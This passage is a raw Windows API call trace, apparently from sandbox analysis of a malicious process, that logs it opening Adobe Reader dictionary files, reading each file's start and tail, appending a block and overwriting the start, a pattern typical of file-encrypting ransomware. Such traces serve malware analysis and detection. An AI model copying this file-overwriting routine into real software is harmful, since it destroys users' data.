hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.637] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1000 [0115.637] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.637] ReleaseMutex (hMutex=0x168) returned 1 [0115.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="itl.hyp", lpUsedDefaultChar=0x0) returned 7 [0115.637] ReadFile (in: hFile=0x204, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1000, lpOverlapped=0x0) returned 1 [0115.644] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0115.645] WriteFile (in: hFile=0x204, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1588, lpOverlapped=0x0) returned 1 [0115.658] CloseHandle (hObject=0x204) returned 1 [0115.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0115.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4000 [0115.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.660] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.660] ReleaseMutex (hMutex=0x168) returned 1 [0115.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lit.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lit.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lit.hyp", lpUsedDefaultChar=0x0) returned 7 [0115.660] ReadFile (in: hFile=0x204, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.834] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3000 [0115.834] ReadFile (in: hFile=0x204, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.498] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3000 [0116.498] WriteFile (in: hFile=0x204, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.499] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0116.499] WriteFile (in: hFile=0x204, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.499] CloseHandle (hObject=0x204) returned 1 [0116.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw56.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0116.580] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.580] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x57400 [0116.580] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.580] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.580] ReleaseMutex (hMutex=0x168) returned 1 [0116.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw56.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw56.ths", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nrw56.ths", lpUsedDefaultChar=0x0) returned 9 [0116.581] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0116.588] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x56400 [0116.588] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.592] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x56400 [0116.593] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.593] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0116.593] WriteFile (in: hFile=0x1d8, lpBuffer=0x2897978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0116.593] CloseHandle (hObject=0x1d8) returned 1 [0116.594] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0116.594] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.595] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7ffe [0116.595] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.595] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.595] ReleaseMutex (hMutex=0x168) returned 1 [0116.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol32.clx", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pol32.clx", lpUsedDefaultChar=0x0) returned 9 [0116.595] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.599] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ffe [0116.599] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.695] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ffe [0116.696] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.697] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0116.697] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.697] CloseHandle (hObject=0x1d8) returned 1 [0116.697] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rumphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0116.698] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.698] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2478 [0116.698] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.698] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.699] ReleaseMutex (hMutex=0x168) returned 1 [0116.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rumphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rumphon.env", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rumphon.env", lpUsedDefaultChar=0x0) returned 11 [0116.699] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.707] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1478 [0116.707] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.829] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1478 [0116.830] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.830] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0116.830] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.830] CloseHandle (hObject=0x1d8) returned 1 [0116.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0116.831] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.832] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7ffe [0116.832] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0116.832] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.832] ReleaseMutex (hMutex=0x168) returned 1 [0116.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr32.clx", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sgr32.clx", lpUsedDefaultChar=0x0) returned 9 [0116.832] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.503] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ffe [0117.503] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.506] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ffe [0117.506] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.510] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0117.510] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.511] CloseHandle (hObject=0x1d8) returned 1 [0117.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0117.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0117.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7fff [0117.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0117.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.513] ReleaseMutex (hMutex=0x168) returned 1 [0117.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slv32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slv32.clx", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slv32.clx", lpUsedDefaultChar=0x0) returned 9 [0117.513] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.523] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6fff [0117.523] ReadFile (in: hFile=0x1d8, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.527] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6fff [0117.527] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.529] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0117.529] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.529] CloseHandle (hObject=0x1d8) returned 1 [0117.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0117.530] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0117.530] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xcc00 [0117.530] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0117.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.531] ReleaseMutex (hMutex=0x168) returned 1 [0117.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0117.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swd.hyp", lpUsedDefaultChar=0x0) returned 7 [0117.531] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0117.534] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xbc00 [0117.534] ReadFile (in: hFile=0x1d8, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.542] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xbc00 [0117.542] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.543] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0117.544] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0117.544] CloseHandle (hObject=0x1d8) returned 1 